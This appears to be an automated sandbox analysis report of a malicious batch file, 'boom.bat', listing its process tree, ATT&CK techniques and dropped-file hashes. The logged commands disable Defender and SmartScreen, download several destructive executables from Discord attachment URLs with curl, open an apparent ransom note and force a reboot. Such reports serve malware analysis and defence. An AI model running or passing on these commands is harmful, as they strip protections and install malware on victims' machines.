C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe526dab58,0x7ffe526dab68,0x7ffe526dab78
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=400 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:2
  2⤵
  PID:2876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:8
  2⤵
  PID:3936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:8
  2⤵
  PID:1404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:1
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:1
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4316 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:1
  2⤵
  PID:5472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:8
  2⤵
  PID:5664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5028 --field-trial-handle=1932,i,10331884964590850252,16258714011868551117,131072 /prefetch:8
  2⤵
  PID:5688

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\boom.bat" "
1⤵
- Checks computer location settings
- Modifies registry class
PID:1880
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:5592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5628
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
  2⤵
  PID:3068
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
  2⤵
  PID:4304
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\NOTE_araked.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3424
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/951496409318817872/967582484843888640/clippy.exe -O
  2⤵
  PID:5748
- C:\Windows\system32\timeout.exe
  timeout 10
  2⤵
  - Delays execution with timeout.exe
  PID:6060
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/951496409318817872/967598739739013120/EndermanchDesktopBoom.exe -O
  2⤵
  PID:3864
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/951496409318817872/967591069594320896/EndermanchScreenScrew.exe -O
  2⤵
  PID:6108
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/951496409318817872/967595207208083496/EndermanchHydra.exe -O
  2⤵
  PID:1932
- C:\Windows\system32\curl.exe
  curl https://cdn.discordapp.com/attachments/951496409318817872/967574561547776000/Zer0Mem0ryMelting.exe -O
  2⤵
  PID:5680
- C:\Windows\system32\timeout.exe
  timeout 60
  2⤵
  - Delays execution with timeout.exe
  PID:5756
- C:\Windows\system32\shutdown.exe
  shutdown /r
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
ddad391a3173e4a329a3d110a416b3a2

SHA1
4d8ecb9164a5c25e2ab94faa0a8e734d273884e1

SHA256
e0f420088e1e4916ab4e1a4058d557b6e7394147e56b5f920e1daf559b1007e6

SHA512
426b138e6b7278f35dd10bbad5e1eb2c5445a529e1d1f3e06eb3fb3be32e4470a70a46aa592c18370f3360ef9a9eafb454d619ed52ea1883ed6efa38f711bc7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
c07114c0d1271adb9ca909a18422995c

SHA1
a8760a40d86c57125b18416c8bdcabc04cb362e7

SHA256
ab3329f9a47645686ee96300aab77ac0865a47a4663748592a06f1abea5b1c46

SHA512
297a658d79dd2da3eeda22829321af9ec1babaf6426a3de671176f700778fe7c22a4bf20a9f0769534817583b79237f167fd0024eaddedf0ca119c20e5b2554d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1bf53dd4d38e25dc56d99dc2b7d516e1

SHA1
8e22f3ab50f9eb12833d140eec181646e5d31f36

SHA256
241b75a9ddbe933601fbdaa347e61621dc9414ea8ff403705857e40ded44789c

SHA512
32114e566500aa9a2c39640fdf3fe1a13590797abf645e89ce589660b0ca2a63ee42c4d8b3e984fa1b2703c6c0d9e0a0f810ea2812a59f0ccc6054303601a75c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
65c65a458a450251c675301b7e048135

SHA1
46bf2ff4f501a9188d7de15ac1f5ad2925ab02a5

SHA256
b8b60e37da45b396490d4cad8c3267a9f8ff3d284f56a2429820e3ac0b2d976e

SHA512
696d70ff54aa8e2c56208af4d8136414b1c00c6a2edc6f605733f698db5258473e1a6ac10afdca3bb586da583d0ba9ba7bd60533529f8cc53c7e848a172fd341

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
285KB

MD5
d98a4a5ac8e2b6a041839d32dfe3624d

SHA1
2baab7336ee7b358e97a0e2347837d09da9f2804

SHA256
437bb2f5796fddd601d8406449b98f0258801c06fd5d3e31f7b2c93c6b7bbd86

SHA512
58683f53c49f0c92b054503daef718a107696e88f6d61a59a489367b1bfa01498a3d61ab6711f1e8b749557a1515aa995d1788eaf1a7cc2c8159107469dab30f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3c78617ec8f88da19254f9ff03312175

SHA1
344e9fed9434d924d1c9f05351259cbc21e434d3

SHA256
3cb47fcdca33bb3c8f4acc98424140987235ad79815da4f0e7593e4591ae90ed

SHA512
5b58675088b0fc2b2d705cb648ea89385b80c7cf908b0f4f95a9acdbd350b50754e1b586202db6a918eef70029fafb210947f3c43c570ecf7657e08939fd7e9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
09c7ae658385f6de986103443217840b

SHA1
298d880503edce4413337c09d3525f27a2edcd28

SHA256
91e04ec38abdb0204458543592c4621b7bc0306407884f764aa9596a52454cd7

SHA512
4e1272b209487d1e9e7d8502be49ebce91c76718410e817b3ac7faf47d9b699210aab1b941fbb5ddafc192ddf4b2ba151afd47fab753ec62bc0bca36039c55c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
41KB

MD5
3358e831188c51a7d8c6be54efafc248

SHA1
4b909f88f7b6d0a633824e354185748474a902a5

SHA256
c4cd0c2e26c152032764362954c276c86bd51e525a742d1f86b3e4f860f360ff

SHA512
c96a6aae518d99be0c184c70be83a6a21fca3dab82f028567b224d7ac547c5ef40f0553d56f006b53168f9bba1637fdec8cf79175fd03c9c954a16c62a9c935e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
69KB

MD5
7d5e1b1b9e9321b9e89504f2c2153b10

SHA1
37847cc4c1d46d16265e0e4659e6b5611d62b935

SHA256
adbd44258f3952a53d9c99303e034d87c5c4f66c5c431910b1823bb3dd0326af

SHA512
6f3dc2c523127a58def4364a56c3daa0b2d532891d06f6432ad89b740ee87eacacfcea6fa62a6785e6b9844d404baee4ea4a73606841769ab2dfc5f0efe40989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
1.2MB

MD5
b55b8baf9ced2da93c17f6b749734870

SHA1
b7a0adbe14b12fd8f7bc3fbc27a5611693057cec

SHA256
38f98d8fffec9928c61be37a6d4a3da72e027dfc239b53d784964cc922a201a4

SHA512
69c98fb523179d002566ec88bfcd12800ec0154ef76efc017d05c1dc5f2ea479e5ced0e9c6158a2e8546f88fe19d58a3627bbea546e4ab6905f4f340767fffe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
20KB

MD5
628ba8d31375849e0943894669cd033c

SHA1
4fa6d50a37fa2dadec892474d3e713ef9de2d8a1

SHA256
80e3440c312f921afe33a7d4a3d11d1d2dc7162f8f50b748b796f424441d10d6

SHA512
d4406493dc8767c479460f3039b038866549feebf392280384da08adbcad2e871720d046220cb67ebe3ab75c14e06a31df2fa7c0f2c17f91eda26ba0a709d27f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
37KB

MD5
669b1563b95fce26d9ddc3c7e9bdc538

SHA1
275e4ae2606a0da908003b77ea06b24ea8b66214

SHA256
d46765072d87d9892a0f6f8f9849eafe0abecee9d662e99f8b45d8c5b22ac667

SHA512
09e066f5a1974927b2cb607a8b953f2732928c7347f65cdfcdb573170840562de6eae091a61108827b3ae0799c16bfbd41d858ee1a8bc57d9bb1fac814438302

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

Filesize
37KB

MD5
f31a1ab9f483d9db21349522e39dd16e

SHA1
01a275d7fc1c4f578fa506c8e0bf9b7787dd4806

SHA256
463800c9ec072ae72a4f6fdc1f2f779c792cb7ceb6f57c7d1231eabefad2bd9d

SHA512
cab9bf13c36b854bef939e1d09c8d896caf1d7c20f6948f70f27eaf2869e49c8b9be728b4c95926ba869a987516a79d3193d416b0582b7570a58269c8caa7603

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

Filesize
20KB

MD5
0f3de113dc536643a187f641efae47f4

SHA1
729e48891d13fb7581697f5fee8175f60519615e

SHA256
9bef33945e76bc0012cdbd9941eab34f9472aca8e0ddbbaea52658423dc579f8

SHA512
8332bf7bd97ec1ebfc8e7fcf75132ca3f6dfd820863f2559ab22ac867aa882921f2b208ab76a6deb2e6fa2907bb0244851023af6c9960a77d3ad4101b314797f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

Filesize
21KB

MD5
8680ad8cc782b74ee7a15f0a042c76f1

SHA1
ec430c456dedd9a2360703a826491fcd69f6dd8b

SHA256
af745264049ea73c66c1dc7783e59fcfe94c0506337867380ae638e694cfe5e7

SHA512
7869afe9f737bc31a9c33b03014f4d5239cc48a798deabc0fdc835fd6736a99b17d181e57866ac960bbdb0d1e3e8610cf97bb01762435d8808ca56f1e74dc2be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
841dfbcb63e40f28b98d23685296e8c9

SHA1
a787cd33185e7ca9bf44390ddf207e7eba3cfcc7

SHA256
ba241274d1d613013a729917d150afb140a0104fa1f03520bd57eadca48479b1

SHA512
15bcca51e634c7c2b2741e4152087ebf7215db4882bd958035ab83a63c682cc749cb65075a7baafbe89b977d7cc2647832aa45f5bafa3abb3030dd8cee3a3b18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
384B

MD5
a08472b03cb1ccbe75e03e6012f1657b

SHA1
3b8739c7e53d3cf3ae95cd69a982d5abcf549a5e

SHA256
aa4a82d36c8b5507d7875d0a614878094a58b960868710ab2c58088bd331deec

SHA512
93fba0a8612cccad508fd5c96e6ccb34a560c22bc46e7b0be263fd3bd7bcf5db35bbce2ee978e888e046116b359e718542c8f1035408673a0ac5b75ba735dabf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
13fc3f186f31bb09f7f79b4e79e2c4ef

SHA1
cf8cc831461bdc7a05ff379db258c410d732c3db

SHA256
30e2c0865ab7a7a6f353612921d4b3054aab4d33d0c2402293abec98ae9d7aca

SHA512
e85e0e72e76356c1b6f45f0add482306a21d95fb7efc30a2638d34fe36b61eefed7ce2fe233f735d04be43f78da40458fd2f87946511d3196c38e595353b760b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
f46e4e0eb4a26b826aa97b422af2a221

SHA1
f0de8991894b17e4cb3df5ca7382bb409a94d354

SHA256
c58f69e84eb041f08a074453e12edd4e2404e3a3c008f527ccb99508e6cf8d4d

SHA512
0f57e2aacea7b9fca6f64197f4017ed003ed02e4138a555f480d0edb22c38f3aa8b2de40faafd9deef448b6d9f0274d5d37159b6adf6155d0f029ffda187532f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
fca17fdfb011018ab917cacba9209935

SHA1
4815250deabeee8c65a5f369ec3a2552bdb80610

SHA256
cb507ce4fbc37e72511219aaa97c91c9c95183539b4ad3180f0c84407a08b430

SHA512
6ad4fa97566bf5dc3f3f4db5fd01f4867ed284f432853cdcd495fd7247e0205083f37011e7c56a419ecd245e57033e76ea7a43680ce79bcadd13083bad2c2f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7aa962e66fafa1c22b12ac3e2127c032

SHA1
27797fd69017d25c378b953b7fe4431f1a236b5c

SHA256
82a69646e935e65efc6e2b5e5b94a4be9394617b38ef881243c9dc62428dfc35

SHA512
6807aaf8d39d69ceb281cf7f03190ea71c32550ab72bb52ebf74272b480462771e5475341ec3eaf8a28ff3431e66462c868607b72f912ba0ea8dc87d25092bd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
553cb852ab6867d43c0923e6f54c6aba

SHA1
9ca20eb936de1f40d42fdf99cb61e9f25d465e81

SHA256
f2722688e826cb0956ea8200127d6a95a7ae57ec41092d96b1f80e4935824833

SHA512
b0f0472b2b1ed6b43bbd9fe899f1d260b179fa24976b07467066f1aed9fd40c154c59a4624148330b7305bb5fdf2e19740d3e94abe4a2b6fadac89438259a9ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dfd93d6a9672b2506efa19f74401138d

SHA1
eb65b667b4ebe9f121ec1c8090cd95b48b5a41b1

SHA256
a5f07067816244cccf3111f5f3e053f5ae6e9419fa258d2482e72c055d61182e

SHA512
39546ebf4170189b0c740527f67832a81d72a32f931b3be31e12d4262d9c50d8baabf4923b726323ebcb37753eafc2b8e5e4642ef7989e794c45ff729aab4649

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1b8b876ebaa4619bffa52caace43a0f9

SHA1
67e14336d26ea4f98804396576110cca33655d63

SHA256
cac13e661ed63e13292ee3d527d9e32160977a06265bcbe7b009047267fca8d4

SHA512
51582007e369216efedb8773fe2021c59eb882ee1ed70b2b2688f20d5939a7bf6bb2bcfd5e364e60888bb44183f1e2f516faa77f28b1c7cf285ab2c0e85ec37e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
106a2fb0006dc0fd6a965f54844a0b10

SHA1
9bde1e680e4474127b79424c1065e65faa5d7cdb

SHA256
028c6f6e3c80c1a00e78b39d88c05aae10f5767d66bdb65c425ffd1e9ba09266

SHA512
e35f2254ac5504fece8b58bc8d345b32effbe039758cda3ecfc6a8bd6e692184862ba0d21b1fd26e448759ac4741bfa9a75b1a951c92069f256754e89a889ed7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d46291009745eafe5e2c96ce86f3cf4c

SHA1
2fe0173ab2c8d610a3663eb135e09d693e93b561

SHA256
300ddb76544f50a56b49a128db7c40187e93ed322e1fbc345606bc51143e6d3b

SHA512
55fa189da8fca3c75a21c914f6f1d955ceafdb4552291f0cd27293798ee7455c395568f32777c2c1041f6f6ec0a79d5a9dd8cf54bcd7513e138751e4a6367256

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
078c6a6b8eeb7f7571b87f1e58d2201d

SHA1
785c4bbf83dd6a31acfc76392b401c38598ae6d7

SHA256
2c25d5d5a0c9a981364cec0e8576fc06c941512b0bcbae57795656dd374163c7

SHA512
ab70f2dbebe99bfea56d97ac6916a9696878368c3145733a52f082291500c19d870f18bd8953a1349cd1622b60a694e29ea2ad7c903ccb14beb4c927fab93294

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c5f22f13a9dcdf0a8f75c67061e57c5f

SHA1
1e6f954934ac8ac2f0160024c676dc7617c511d2

SHA256
b895f38953aacdeeabc3f182ef0f05c2d863eafc261b8efae1fa28ab1582bf7d

SHA512
edadd059f2969fbc9fa0ed5780e85e9a47ae5c93e62192081d0c368e42da9d4eefe4c8d40dab273e197efa3ae201859f817ba1413a926010f4fc3877027fd634

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ab9fc7a842149367ebbe9a9646ae0c5d

SHA1
34ea2eb52547496d7b04cdbe3c2f4457dc3756b0

SHA256
809f2e07045d2c7d43924ea6d33c5b873642b7718441cab63b3ede9cde87a9c5

SHA512
c0b10d077b41a9c7d5d45aee56f02a5b038f3c8aed51dc19ef635a7e4ce2b4eba9c0a8d2b9f0203fcc98434bc04e3acdf80fb6c12f26517d0306c9e209b7c146

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ddf55973d961ddb992be58e7c9752ce8

SHA1
5913f62c4a161ee2be0c39140caea491f1535fe3

SHA256
6f33d9764cce0e851a113d3bb122dcb606a7c6e4a19bcfa91368190ad98b2fe4

SHA512
07c7a09da4cee70aae67d41f25bc47c661306e6168d22323ede415952d273e0b7b06f3ea310cbe2fe06a575a82ee2081845d864e2e8ab4aa45f0cef368f48c4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3a6466ed7c5c7570b512bbac6570655c

SHA1
682f3a73cfc5d3552bd4f943970d4ee5f82062ff

SHA256
094bae02c6d7dd41d0dd73fcbbbb1f631370a83c457db10b7aa95ba010c5e1a1

SHA512
7db57504fa4301034cc6cac16cc6d39a25aca37cfbffe2efc68e59d3c8e137e545ae6b10581c8621456656b305f22fa7dad9c3edee3ecf09423a0c4faa3eef98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
5ea46fb2f34f52ad139de13fd8cecece

SHA1
cbabf443330f2b2cbe47a44cad586cd8178a4974

SHA256
09d745a68f5020759741c1efef1cd0b02a422547530f79882cd266b0a8f134f6

SHA512
d65182943ef9bcfcdfcf53af1682b6c7260476b179b5cb502276b6b1f13fa59a5e1ac4707fddb5516bc0bf80b79308242651f15f61c1554719b188bb91f57578

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
13bb53dc23e9dd95a71d875365e7607b

SHA1
83400484886440e06c30495e8bb8d6438b4972e2

SHA256
f5b26d4b9cc3089002345cdfe4d7a6e88b509bfcf385e9dea26138b5206fec0c

SHA512
3429f7d0248f21694f3d2dc227e7fee6e62abaa99514e748007fdf66c4e48785c306103cf4cf6ff78a7b12ee8e44007169495873d1161c2542416841faeaee8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
a6a23aa220bc5a258b3240730b97ba0f

SHA1
9846a348ce048bfbbf6827ce2229477ceb3617a3

SHA256
a2c516a95fe762536b69d206a755c452f797a4fc2cfe4a4c81b0c864fbfb0b75

SHA512
e98b62577cc21b7713cba1ca13bc39046b8c9abdc43db60ad6b2f649e65a3a01eb219cd34a99c90ab305952d6de103021534f3f0ff2fd915b24c7f6f0492c36c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
025deff8942e7c2a70a8ee14fbb2e2fd

SHA1
f6905df79900347ca67f41ab7a8b208a2b57301c

SHA256
0709045642e664a4fdfd27961bfda6f1846e2366d5bfb9429edea1394cd8fc89

SHA512
1ded4868ff89b46012d97e690e67d74f6770a74d27ecf780f84636f3ff710320ac7ce10b62a16f5e4b17aa8a4340ed3d80eff408e3b2f091d6796f9c9c7f3a74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
5c4eeb3bfc5a7d1e413b27798ddc9b9a

SHA1
6e5b018c0e02f85fa9962276874bfcf256f60189

SHA256
463492ab35258a059cc2088a37603523a27e3e5247033f8973bba8fd270dbfea

SHA512
7314649bf3191aa0c6a07c3a583375e1842011d37a14e14d01787f73d6e26603d3500b5c41694f710ecae265259832b78fa1af27903f1b68ec6989fbb18c7d14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
17b1e9546c38002f3708114452e3f207

SHA1
e2b5072480cf57bfebde48e06307ab0da39e430e

SHA256
dc3673b778356e0686691a9bc69d8cc1f28ceba1929585460f39c721dc1756f8

SHA512
c9a309006fffa5300d78bf67239dd488396fb5b9b6b346925a747e08732aa8ad2abd90a73d7aad8d50d9629bcfb9915461ff03cda5d5c35fc244d91eec996745

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
e361ff1ada08ae867db67cb24451b07f

SHA1
2ab50824f1afc9dcc7c8d156f8bbc3c24ba116ef

SHA256
d7cc398c886ea73576cc741d457db5723a23d9a93f1dfb3c529559baa876887b

SHA512
f5006b4e4a75f946fd560fd4c14cfaacb2c6e54935e79debae6eae35d477de6f8a697292f5fb35182a9b5bfb06a3d936396272f38b5f1d7d96decd8e4572a951

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
762c69926dcec195c0e420b501c89925

SHA1
dc82347c88ca38ef6ef6bd8e72e3fd609992b94b

SHA256
7a2858a4b9834e76e0ac9537e097964f8e017a8300e80ae524dd17a61698d999

SHA512
